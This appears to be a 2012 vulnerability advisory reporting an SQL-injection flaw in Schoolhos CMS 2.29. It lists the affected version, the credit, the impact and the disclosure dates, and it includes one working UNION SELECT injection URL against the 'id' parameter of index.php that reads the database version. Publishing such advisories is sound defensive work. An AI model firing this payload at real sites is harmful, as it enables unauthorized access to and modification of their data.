Schoolhos CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Credit:
The information has been provided by Cumi++ .
Vulnerable Systems:
* Schoolhos CMS 2.29
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit:
SQL : SQL injection
http://127.0.0.1/schoolhost/index.php?p=info&id='3'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--Cumi++
Disclosure Timeline:
Published: Oct 22 2012 12:00AM
Updated: Oct 22 2012 12:00AM
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by